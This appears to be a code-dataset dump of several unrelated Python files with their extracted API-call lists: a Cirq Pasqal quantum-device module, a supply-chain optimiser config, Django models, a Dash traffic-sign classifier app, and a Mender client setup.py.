if operation.gate.invert_mask != (): raise NotImplementedError( "Measurements on Pasqal devices don't support invert_mask." ) def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None: """Raises an error if the given circuit is invalid on this device. A circuit is invalid if any of its moments are invalid or if there is a non-empty moment after a moment with a measurement. Args: circuit: The circuit to validate Raises: ValueError: If the given circuit can't be run on this device """ super().validate_circuit(circuit) # Measurements must be in the last non-empty moment has_measurement_occurred = False for moment in circuit: if has_measurement_occurred: if len(moment.operations) > 0: raise ValueError("Non-empty moment after measurement") for operation in moment.operations: if isinstance(operation.gate, cirq.MeasurementGate): has_measurement_occurred = True def __repr__(self): return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})' def _value_equality_values_(self): return self.qubits def _json_dict_(self): return cirq.protocols.obj_to_dict_helper(self, ['qubits']) class PasqalVirtualDevice(PasqalDevice): """A Pasqal virtual device with qubits in 3d. A virtual representation of a Pasqal device, enforcing the constraints typically found in a physical device. The qubits can be positioned in 3d space, although 2d layouts will be supported sooner and are thus recommended. Only accepts qubits with physical placement. """ def __init__( self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]] ) -> None: """Initializes a device with some qubits. Args: control_radius: the maximum distance between qubits for a controlled gate. Distance is measured in units of the coordinates passed into the qubit constructor. qubits: Qubits on the device, identified by their x, y, z position. Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit. Raises: ValueError: if the wrong qubit type is provided or if invalid parameter is provided for control_radius.""" super().__init__(qubits) if not control_radius >= 0: raise ValueError('Control_radius needs to be a non-negative float.') if len(self.qubits) > 1: if control_radius > 3.0 * self.minimal_distance(): raise ValueError( 'Control_radius cannot be larger than 3 times' ' the minimal distance between qubits.' ) self.control_radius = control_radius self.gateset = PasqalGateset(include_additional_controlled_ops=False) self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate)) @property def supported_qubit_type(self): return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit) def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. Args: operation: the operation to validate Raises: ValueError: If the operation is not valid """ super().validate_operation(operation) # Verify that a controlled gate operation is valid if operation in self.controlled_gateset: for p in operation.qubits: for q in operation.qubits: if self.distance(p, q) > self.control_radius: raise ValueError(f"Qubits {p!r}, {q!r} are too far away") def validate_moment(self, moment: cirq.Moment): """Raises an error if the given moment is invalid on this device. Args: moment: The moment to validate. Raises: ValueError: If the given moment is invalid. """ super().validate_moment(moment) if len(moment) > 1: for operation in moment: if not isinstance(operation.gate, cirq.MeasurementGate): raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.") def minimal_distance(self) -> float: """Returns the minimal distance between two qubits in qubits. Args: qubits: qubit involved in the distance computation Raises: ValueError: If the device has only one qubit Returns: The minimal distance between qubits, in spacial coordinate units. """ if len(self.qubits) <= 1: raise ValueError("Two qubits to compute a minimal distance.") return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2]) def distance(self, p: Any, q: Any) -> float: """Returns the distance between two qubits. Args: p: qubit involved in the distance computation q: qubit involved in the distance computation Raises: ValueError: If p or q not part of the device Returns: The distance between qubits p and q. """ all_qubits = self.qubit_list() if p not in all_qubits or q not in all_qubits: raise ValueError("Qubit not part of the device.") if isinstance(p, GridQubit): return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2) if isinstance(p, LineQubit): return abs(p.x - q.x) return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2) def __repr__(self): return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format( self.control_radius, sorted(self.qubits) ) def _value_equality_values_(self) -> Any: return (self.control_radius, self.qubits) def _json_dict_(self) -> Dict[str, Any]: return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits']) @_compat.deprecated_class( deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).' ) class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates): """A gate converter for compatibility with Pasqal processors. Modified version of ConvertToNeutralAtomGates, where a new 'convert' method 'pasqal_convert' takes the 'keep' function as an input. """ def pasqal_convert( self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool] ) -> List[cirq.Operation]: def on_stuck_raise(bad): return TypeError( "Don't know how to work with {!r}. " "It isn't a native PasqalDevice operation, " "a 1 or 2 qubit gate with a known unitary, " "or composite.".format(bad) ) return cirq.protocols.decompose( op, keep=keep, intercepting_decomposer=self._convert_one, on_stuck_raise=None if self.ignore_failures else on_stuck_raise, )
[ "numpy.sqrt", "cirq.protocols.decompose", "cirq.AnyIntegerPowerGateFamily", "cirq._compat.deprecated", "networkx.from_edgelist", "cirq._compat.deprecated_class", "cirq.protocols.obj_to_dict_helper", "cirq_pasqal.PasqalGateset" ]
[((10990, 11116), 'cirq._compat.deprecated_class', '_compat.deprecated_class', ([], {'deadline': '"""v0.16"""', 'fix': '"""Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset())."""'}), "(deadline='v0.16', fix=\n 'Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).')\n", (11014, 11116), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((3091, 3179), 'cirq._compat.deprecated', '_compat.deprecated', ([], {'fix': '"""Use metadata.qubit_set() if applicable."""', 'deadline': '"""v0.15"""'}), "(fix='Use metadata.qubit_set() if applicable.', deadline=\n 'v0.15')\n", (3109, 3179), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((2636, 2651), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {}), '()\n', (2649, 2651), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((6074, 6125), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['qubits']"], {}), "(self, ['qubits'])\n", (6107, 6125), False, 'import cirq\n'), ((7717, 7771), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {'include_additional_controlled_ops': '(False)'}), '(include_additional_controlled_ops=False)\n', (7730, 7771), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((10519, 10582), 'numpy.sqrt', 'np.sqrt', (['((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'], {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\n', (10526, 10582), True, 'import numpy as np\n'), ((10917, 10986), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['control_radius', 'qubits']"], {}), "(self, ['control_radius', 'qubits'])\n", (10950, 10986), False, 'import cirq\n'), ((11843, 11999), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (['op'], {'keep': 'keep', 'intercepting_decomposer': 'self._convert_one', 'on_stuck_raise': '(None if self.ignore_failures else on_stuck_raise)'}), '(op, keep=keep, intercepting_decomposer=self.\n _convert_one, on_stuck_raise=None if self.ignore_failures else\n on_stuck_raise)\n', (11867, 11999), False, 'import cirq\n'), ((2747, 2815), 'networkx.from_edgelist', 'nx.from_edgelist', (['[(a, b) for a in qubits for b in qubits if a != b]'], {}), '([(a, b) for a in qubits for b in qubits if a != b])\n', (2763, 2815), True, 'import networkx as nx\n'), ((7819, 7865), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', (['cirq.CZPowGate'], {}), '(cirq.CZPowGate)\n', (7849, 7865), False, 'import cirq\n'), ((10378, 10430), 'numpy.sqrt', 'np.sqrt', (['((p.row - q.row) ** 2 + (p.col - q.col) ** 2)'], {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n', (10385, 10430), True, 'import numpy as np\n')]
# -*- coding: utf-8 -*- from enum import Enum, IntEnum, unique import os APP_NAME = "mine2farm" NETWORK_NAME = "CenterAxis" LOG_LEVEL_CONSOLE = "WARNING" LOG_LEVEL_FILE = "INFO" APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/") LOG_FOLDER = APP_FOLDER + "app/log/" LOG_FILE = "%(asctime)_" + APP_NAME + ".log" OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/") CANVAS_URL = "http://127.0.0.1/canvas.xlsm" # DB DB_NAME = None DB_HOST = "172.29.161.208" DB_PORT = 5006 DATA_SERVICE_ADD = "172.29.161.208" DATA_SERVICE_PORT = 5001 # Results DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None DB_DETAILED_RESULT_COLLECTION_NAME = "detailed" DB_GLOBAL_RESULT_COLLECTION_NAME = "global" DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best" DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best" DB_SENSITIVITY_COLLECTION_NAME = "sensitivity" RESULT_BATCHES_SIZE = 25 HEAD_DATA_BITS = 17 DB_NAME_BITS = 20 RANDOMIZE_RESULTS = False # RabbitMQ RABBITMQ_SERVER = "localhost" RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE" RABBITMQ_CYCLE = 3 RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL" RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL" RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin" # Memcached MEMCACHED_SERVER = 'localhost' MEMCACHED_PORT = 11211 # Dashboard DB_LOAD_FROM_SERVICE = True # Monitoring MONITORING_APP_NAME = "mine2farm_monitor" MONITORING_SERVER = "172.29.161.208" MONITORING_PORT = 5002 MONITORING_DB_NAME = "task_history" MONITORING_COLLECTION_HISTORY_NAME = "task" MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history" MONITORING_STEP = 1 MONITORING_NB_PAGE = 10 # Mongodb-bi MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin" # Mongodb MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin" # params LOGISTICS_LP = False MODE_DEBUG = False GRANUL_RELAX = False class HTML_STATUS(IntEnum): ERROR = -1 OK = 0 # Model MONIKER_SEPARATOR = "/" WACC = 0.1 T0 = 2020 TMAX = 2031 class PriceParams(Enum): WACC = 0 TENOR = 1 VOLUME = 2 class PipelineType(Enum): COMMON = 0 PRODUCER = 1 TRANSPORT = 2 BALANCE = 3 PRICE = 4 SALES = 5 @unique class PipelineLayer(IntEnum): UNDEFINED = -1 MINE = 0 BENEFICIATION = 1 SAP = 2 PAP = 3 GRANULATION = 4 LOGISTICS = 5 RAW_MATERIALS = 8 COMMON = 9 SALES_PLAN = 10 MINE_BENEFICIATION = 11 UNIT_CONVERSION_MATRIX = 12 PIPELINE_SCHEMA = { PipelineLayer.COMMON: { "type": PipelineType.COMMON, "dico": ["location", "opex", "unit", "currency", "output", "names", "products"] }, PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"], "options": "mining_options", "production": "mining_specific_production", "opex": "mining_opex___specific_consumptions", "capex": "mining_capex", "priority_mines": "prioritymines" }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"], "options": "beneficiation_options", "production": "beneficiation_production", "opex": "beneficiation_opex___specific_consumptions", "capex": "beneficiation_capex" }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"], "options": "sap___power_plant_options", "production": "sap___power_plant_production", "opex": "sap___power_plant_opex___specific_consumptions", "capex": "sap___power_plant_capex", "product_type": "sap.product" }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"], "options": "pap_options", "production": "pap_production", "opex": "pap_opex___specific_consumptions", "capex": "pap_capex", "product_type": "pap.product" }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"], "options": "granulation_options", "production": "granulation_production", "opex": "granulation_opex", "capex": "granulation_capex" }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"], "options": "logistics_options", "production": None, "opex": "logistics_opex", "capex": "logistics_capex" }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "data": "raw_materials" }, PipelineLayer.SALES_PLAN: { "type": PipelineType.SALES, "data": "sales_plan" }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": PipelineType.COMMON, "data": "conv_matrix" }, } SUPPLY_CHAIN = "mine2port" DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE), "sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)} COMBO_NODES = { PipelineLayer.MINE_BENEFICIATION: { "url": "mining_wp_connections", "upstream_layer": PipelineLayer.MINE, "downstream_layer": PipelineLayer.BENEFICIATION } } COMBO_NODES_SEPARATION = "--" class FunctionType(Enum): COST_PV = 0 CASH_COST = 1 FULL_COST = 2 class ScenarioGeneratorType(IntEnum): FROM_PATHS = 0 FROM_OPTIONS = 1 SPECIFIC_SCENARIOS = 2 SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS PIPELINE_METADATA = { PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "production": ["Name", "Extraction", "Quality", "Unit"], "opex": ["Name", "Extraction", "Capacity", "Item", "Unit"], "capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"], "opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"], "capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "production": ["Location", "Process", "Product", "Unit"], "opex": ["Location", "Process", "Item", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"], "capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"], "capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "columns": ["Item", "Unit"] }, PipelineLayer.SALES_PLAN: { "type": PipelineType.PRICE, "columns": ["Type", "Product", "Unit"] }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": PipelineType.COMMON, "columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"] }, } class ShuffleLevel(IntEnum): UNDEFINED = 0 SHUFFLE_WITHOUT_PERM = 1 SHUFFLE_WITH_PERMUTATIONS = 2 SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3 SHUFFLE_WITH_UNNAMED = 4 SHUFFLE_LEVELS = { PipelineLayer.MINE: ShuffleLevel.UNDEFINED, PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED, PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED, PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED, PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED }
[ "os.getenv" ]
[((195, 253), 'os.getenv', 'os.getenv', (['"""JESA_MINE2FARM_HOME"""', '"""C:/GitRepos/mine2farm/"""'], {}), "('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')\n", (204, 253), False, 'import os\n')]
from django.db import models # Create your models here. class Destination(models.Model) : name = models.CharField(max_length = 100) img = models.ImageField(upload_to = 'pics') desc = models.TextField() price = models.IntegerField() offer = models.BooleanField(default = False) class News() : id : int img : str date : int month : str headline : str category : str desc : str
[ "django.db.models.TextField", "django.db.models.IntegerField", "django.db.models.BooleanField", "django.db.models.ImageField", "django.db.models.CharField" ]
[((103, 135), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (119, 135), False, 'from django.db import models\n'), ((148, 183), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""pics"""'}), "(upload_to='pics')\n", (165, 183), False, 'from django.db import models\n'), ((197, 215), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (213, 215), False, 'from django.db import models\n'), ((228, 249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (247, 249), False, 'from django.db import models\n'), ((262, 296), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (281, 296), False, 'from django.db import models\n')]
import base64 import io import dash import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc from dash.dependencies import Input, Output import numpy as np import tensorflow as tf from PIL import Image from constants import CLASSES import yaml with open('app.yaml') as yaml_data : params = yaml.safe_load(yaml_data) IMAGE_WIDTH = params['IMAGE_WIDTH'] IMAGE_HEIGHT = params['IMAGE_HEIGHT'] PATH_MODEL = params['PATH_MODEL'] # Load DNN model classifier = tf.keras.models.load_model(PATH_MODEL) def classify_image(image, model, image_box=None): """Classify image by model Parameters ---------- content: image content model: tf/keras classifier Returns ------- class id returned by model classifier """ images_list = [] image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box) # box argument clips image to (x1, y1, x2, y2) image = np.array(image) images_list.append(image) return model.predict_classes(np.array(images_list)) app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP]) pre_style = { 'whiteSpace': 'pre-wrap', 'wordBreak': 'break-all', 'whiteSpace': 'normal' } # Define application layout navbar = dbc.NavbarSimple( children=[ dbc.DropdownMenu( children=[ dbc.DropdownMenuItem('Réseau de Neurones', header=True), dbc.DropdownMenuItem('SVM', href="#"), ], nav=True, in_navbar=True, label='Modèle', ), ], brand="Menu", brand_href="#", color= "#d90054", dark=True ) cards = html.Div( [ dbc.Card( dbc.CardBody( [ html.H5("Présentation", className="card-title"), html.P( [ 'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.', ], className='card-text', ), ] ), className='w-75 mb-3', color='#f1cbd1', outline='Black', style={ 'margin-top': '75px', 'margin-left': '185px'}, ), ] ) app.layout = html.Div([ html.Div([navbar]), html.Div(cards), dcc.Upload( id='bouton-chargement', children=html.Div([ 'Cliquer-déposer ou ', html.A('sélectionner une image') ]), style={ 'width': '50%', 'height': '60px', 'lineHeight': '60px', 'borderWidth': '1px', 'borderStyle': 'dashed', 'borderRadius': '5px', 'textAlign': 'center', 'margin-top': '75px', 'margin-left': '370px', } ), html.Div(id='mon-image'), html.Div(id='ma-zone-resultat') ]) @app.callback(Output('mon-image', 'children'), [Input('bouton-chargement', 'contents')]) def update_output(contents): if contents is not None: content_type, content_string = contents.split(',') if 'image' in content_type: image = Image.open(io.BytesIO(base64.b64decode(content_string))) predicted_class = classify_image(image, classifier)[0] return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src=contents, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), #html.Div('Raw Content'), #html.Pre(contents, style=pre_style) ]) else: try: # Décodage de l'image transmise en base 64 (cas des fichiers ppm) # fichier base 64 --> image PIL image = Image.open(io.BytesIO(base64.b64decode(content_string))) # image PIL --> conversion PNG --> buffer mémoire buffer = io.BytesIO() image.save(buffer, format='PNG') # buffer mémoire --> image base 64 buffer.seek(0) img_bytes = buffer.read() content_string = base64.b64encode(img_bytes).decode('ascii') # Appel du modèle de classification predicted_class = classify_image(image, classifier)[0] # Affichage de l'image return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), ]) except: return html.Div([ html.Hr(), html.Div('Uniquement des images svp : {}'.format(content_type)), html.Hr(), html.Div('Raw Content'), html.Pre(contents, style=pre_style) ]) # Manage interactions with callbacks @app.callback( Output(component_id='ma-zone-resultat', component_property='children'), [Input(component_id='mon-champ-texte', component_property='value')] ) def update_output_div(input_value): return html.H3('Valeur saisie ici "{}"'.format(input_value)) # Start the application if __name__ == '__main__': app.run_server(debug=True)
[ "dash_bootstrap_components.DropdownMenuItem", "dash.dependencies.Output", "base64.b64encode", "io.BytesIO", "dash_html_components.H5", "base64.b64decode", "dash.dependencies.Input", "dash_html_components.Pre", "yaml.safe_load", "numpy.array", "dash_html_components.Div", "tensorflow.keras.models.load_model", "dash_html_components.Img", "dash_html_components.Hr", "dash_html_components.P", "dash.Dash", "dash_html_components.A" ]
[((524, 562), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['PATH_MODEL'], {}), '(PATH_MODEL)\n', (550, 562), True, 'import tensorflow as tf\n'), ((1083, 1171), 'dash.Dash', 'dash.Dash', (['"""Traffic Signs Recognition"""'], {'external_stylesheets': '[dbc.themes.BOOTSTRAP]'}), "('Traffic Signs Recognition', external_stylesheets=[dbc.themes.\n BOOTSTRAP])\n", (1092, 1171), False, 'import dash\n'), ((353, 378), 'yaml.safe_load', 'yaml.safe_load', (['yaml_data'], {}), '(yaml_data)\n', (367, 378), False, 'import yaml\n'), ((974, 989), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (982, 989), True, 'import numpy as np\n'), ((3345, 3376), 'dash.dependencies.Output', 'Output', (['"""mon-image"""', '"""children"""'], {}), "('mon-image', 'children')\n", (3351, 3376), False, 'from dash.dependencies import Input, Output\n'), ((5671, 5741), 'dash.dependencies.Output', 'Output', ([], {'component_id': '"""ma-zone-resultat"""', 'component_property': '"""children"""'}), "(component_id='ma-zone-resultat', component_property='children')\n", (5677, 5741), False, 'from dash.dependencies import Input, Output\n'), ((1052, 1073), 'numpy.array', 'np.array', (['images_list'], {}), '(images_list)\n', (1060, 1073), True, 'import numpy as np\n'), ((2702, 2720), 'dash_html_components.Div', 'html.Div', (['[navbar]'], {}), '([navbar])\n', (2710, 2720), True, 'import dash_html_components as html\n'), ((2731, 2746), 'dash_html_components.Div', 'html.Div', (['cards'], {}), '(cards)\n', (2739, 2746), True, 'import dash_html_components as html\n'), ((3265, 3289), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""mon-image"""'}), "(id='mon-image')\n", (3273, 3289), True, 'import dash_html_components as html\n'), ((3295, 3326), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""ma-zone-resultat"""'}), "(id='ma-zone-resultat')\n", (3303, 3326), True, 'import dash_html_components as html\n'), ((3393, 3431), 'dash.dependencies.Input', 'Input', (['"""bouton-chargement"""', '"""contents"""'], {}), "('bouton-chargement', 'contents')\n", (3398, 3431), False, 'from dash.dependencies import Input, Output\n'), ((5748, 5813), 'dash.dependencies.Input', 'Input', ([], {'component_id': '"""mon-champ-texte"""', 'component_property': '"""value"""'}), "(component_id='mon-champ-texte', component_property='value')\n", (5753, 5813), False, 'from dash.dependencies import Input, Output\n'), ((4471, 4483), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (4481, 4483), False, 'import io\n'), ((1819, 1866), 'dash_html_components.H5', 'html.H5', (['"""Présentation"""'], {'className': '"""card-title"""'}), "('Présentation', className='card-title')\n", (1826, 1866), True, 'import dash_html_components as html\n'), ((1888, 2301), 'dash_html_components.P', 'html.P', (['["Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ]'], {'className': '"""card-text"""'}), '([\n "Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ], className=\'card-text\')\n', (1894, 2301), True, 'import dash_html_components as html\n'), ((3629, 3661), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (3645, 3661), False, 'import base64\n'), ((3777, 3814), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (3784, 3814), True, 'import dash_html_components as html\n'), ((3832, 3886), 'dash_html_components.Img', 'html.Img', ([], {'src': 'contents', 'style': "{'margin-left': '750px'}"}), "(src=contents, style={'margin-left': '750px'})\n", (3840, 3886), True, 'import dash_html_components as html\n'), ((4016, 4025), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (4023, 4025), True, 'import dash_html_components as html\n'), ((1411, 1466), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""Réseau de Neurones"""'], {'header': '(True)'}), "('Réseau de Neurones', header=True)\n", (1431, 1466), True, 'import dash_bootstrap_components as dbc\n'), ((1484, 1521), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""SVM"""'], {'href': '"""#"""'}), "('SVM', href='#')\n", (1504, 1521), True, 'import dash_bootstrap_components as dbc\n'), ((2879, 2911), 'dash_html_components.A', 'html.A', (['"""sélectionner une image"""'], {}), "('sélectionner une image')\n", (2885, 2911), True, 'import dash_html_components as html\n'), ((4344, 4376), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (4360, 4376), False, 'import base64\n'), ((4690, 4717), 'base64.b64encode', 'base64.b64encode', (['img_bytes'], {}), '(img_bytes)\n', (4706, 4717), False, 'import base64\n'), ((4950, 4987), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (4957, 4987), True, 'import dash_html_components as html\n'), ((5009, 5101), 'dash_html_components.Img', 'html.Img', ([], {'src': "('data:image/png;base64,' + content_string)", 'style': "{'margin-left': '750px'}"}), "(src='data:image/png;base64,' + content_string, style={\n 'margin-left': '750px'})\n", (5017, 5101), True, 'import dash_html_components as html\n'), ((5234, 5243), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5241, 5243), True, 'import dash_html_components as html\n'), ((5338, 5347), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5345, 5347), True, 'import dash_html_components as html\n'), ((5454, 5463), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5461, 5463), True, 'import dash_html_components as html\n'), ((5501, 5524), 'dash_html_components.Div', 'html.Div', (['"""Raw Content"""'], {}), "('Raw Content')\n", (5509, 5524), True, 'import dash_html_components as html\n'), ((5546, 5581), 'dash_html_components.Pre', 'html.Pre', (['contents'], {'style': 'pre_style'}), '(contents, style=pre_style)\n', (5554, 5581), True, 'import dash_html_components as html\n')]
# Copyright 2021 Northern.tech AS # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import setuptools import re VERSIONFILE = "src/mender/_version.py" version_string_line = open(VERSIONFILE, "rt").read() VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]" match = re.search(VSRE, version_string_line, re.M) if match: version_string = match.group(1) else: raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,)) with open("README.md", "r", encoding="utf-8") as fh: long_description = fh.read() setuptools.setup( name="mender-python-client-mendersoftware", version=version_string, license="Apache 2.0", author="Mendersoftware", author_email="<EMAIL>", description="A Python implementation of the Mender client interface", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/mendersoftware/mender-python-client", classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", ], keywords=["mender", "OTA", "updater"], packages=setuptools.find_packages(where="src"), install_requires=["cryptography", "requests", "msgpack", "websockets"], entry_points={"console_scripts": ["mender-python-client=mender.mender:main"]}, package_dir={"": "src"}, python_requires=">=3.6", zip_safe=False, include_package_data=True, )
[ "setuptools.find_packages", "re.search" ]
